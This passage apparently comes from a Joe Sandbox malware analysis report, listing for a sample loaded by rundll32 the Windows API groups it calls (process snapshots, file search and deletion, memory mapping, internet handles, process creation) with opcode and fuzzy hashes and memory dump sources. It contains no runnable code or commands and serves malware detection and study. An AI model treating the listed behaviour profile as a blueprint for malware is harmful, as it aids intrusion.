                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFileInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 3559453722-1545510068
                          • Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                          • Instruction ID: 2d21d8fe8cb0d931de378297b8743f97492188767f7eb940b61c252153aa840f
                          • Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                          • Instruction Fuzzy Hash: 4AF012B251898186D7209F10E49839FB7A5F780398FA00135E28E46A68CB7CD559CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                          • String ID:
                          • API String ID: 65906682-0
                          • Opcode ID: 1418cde18ef981d85429d69ba626c9c5e0dc3944bf2fa7209e1b4b16b78b162b
                          • Instruction ID: e9e86e0ae97fe175b14a43609a25645636f55944ce1a65617dacedaee1cc43b7
                          • Opcode Fuzzy Hash: 1418cde18ef981d85429d69ba626c9c5e0dc3944bf2fa7209e1b4b16b78b162b
                          • Instruction Fuzzy Hash: FB5131F251DE86D5DA50DB20E4C83FAA3E2FB843A4F601135E68D42AA8EF7CE545C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                          • String ID:
                          • API String ID: 3605396869-0
                          • Opcode ID: 1cf766020566e6443c6bce46fc44fb3495e7a6d99ba00991271e77096b33a8ce
                          • Instruction ID: c69d654954a6b4450dbeba05b2f838c14011dd16f60df44f178a012c78adb61f
                          • Opcode Fuzzy Hash: 1cf766020566e6443c6bce46fc44fb3495e7a6d99ba00991271e77096b33a8ce
                          • Instruction Fuzzy Hash: 53D1FCF261CE86D9DA70DB24E4943FAB3A2FB84394F901135D68D42AA9EF3CD545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$AllocateFolderMemoryPathVirtual
                          • String ID:
                          • API String ID: 206084008-0
                          • Opcode ID: eb9421ec7a332903955aa93ad15a3c844f820e63e61f444feda6d35b431bc8ad
                          • Instruction ID: 3d37752e01af937eb33b6848f463439dd1765a9c5025327474123589c6333699
                          • Opcode Fuzzy Hash: eb9421ec7a332903955aa93ad15a3c844f820e63e61f444feda6d35b431bc8ad
                          • Instruction Fuzzy Hash: C5D1C9B2619EC2D5EA60DB24E4853FAB3A2FBC4350F601036D68D82A99DF7CD545CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                          • String ID: @
                          • API String ID: 1610889594-2766056989
                          • Opcode ID: bcde029e8d15cc8f6f1f6978aa9a1a3352948a0736e2faf6ca77c6a614fab714
                          • Instruction ID: 35704c0989db5edac5bce2e541f8797b5f2e97b9ea3f588efa2efdc405ac4f1b
                          • Opcode Fuzzy Hash: bcde029e8d15cc8f6f1f6978aa9a1a3352948a0736e2faf6ca77c6a614fab714
                          • Instruction Fuzzy Hash: 3551EFF6619E86C5EB509B25E4943BAA3A2FBC47A0F601135EA8E43FA5DF3CD445C700
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 487500c56fc5baba734a0549efe86f8d265784918ff913f3653c454c65818df7
                          • Instruction ID: 6ed749c758f842bfd95429bd2b7eeca9c021458c426f5b86800c2d3b18a00bcc
                          • Opcode Fuzzy Hash: 487500c56fc5baba734a0549efe86f8d265784918ff913f3653c454c65818df7
                          • Instruction Fuzzy Hash: 9C91F3F161DE86D9EA50DB20E4883FAA3E2FB84754F602035E58E42AA9DF3CD545C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 01bec8911bb4f9af00197d5f4fc03d1600d8605cb0f0ec9bee9f2296ad5b7041
                          • Instruction ID: 643f1de5ea3033fb9b387c6882573495212395711b7a5b0b988652566cf32dab
                          • Opcode Fuzzy Hash: 01bec8911bb4f9af00197d5f4fc03d1600d8605cb0f0ec9bee9f2296ad5b7041
                          • Instruction Fuzzy Hash: DB512CB160CE41C6E6509B24F4983BAA7A2FB847B4F201235EA9D47BE8DF7CD445CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 4137211488-0
                          • Opcode ID: 122b4440f3820f507c9c7f722be5ef18d2b0d523ffa98e5bd68bd12a46e16220
                          • Instruction ID: 35ddf32a9203877f86cace158fb8afb67d5f3004718057697168a249f7df91db
                          • Opcode Fuzzy Hash: 122b4440f3820f507c9c7f722be5ef18d2b0d523ffa98e5bd68bd12a46e16220
                          • Instruction Fuzzy Hash: C791E1F2A1DE82DADA60DB64E4842FAB3E6FB84350F601135D68D42B69DF3CD545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen
                          • String ID:
                          • API String ID: 435140893-0
                          • Opcode ID: c6d46565824af0f64668203f6a52407f04d2c0bf92a299b4f424fdf3a9ff470a
                          • Instruction ID: 0975b5962a9f0a656cbf8d34362133103020a78d4eb9124f34698408092c89ab
                          • Opcode Fuzzy Hash: c6d46565824af0f64668203f6a52407f04d2c0bf92a299b4f424fdf3a9ff470a
                          • Instruction Fuzzy Hash: 6A41DAB6629A41CAE760CB25F09976AB3E2F785754F202025F78A47B58CF7DD844CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true
                          • Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandlewsprintf$CreateProcess
                          • String ID:
                          • API String ID: 2803068115-0
                          • Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                          • Instruction ID: 48fb8f4b1721913af5da16f6dfdae5630c0aa755f90df2cb670c959ba85a1840
                          • Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
                          • Instruction Fuzzy Hash: B941CBF2508E82D9EA60DF24E4883FAB7A2FB84354F605035D68D82A69DF7CD559CB40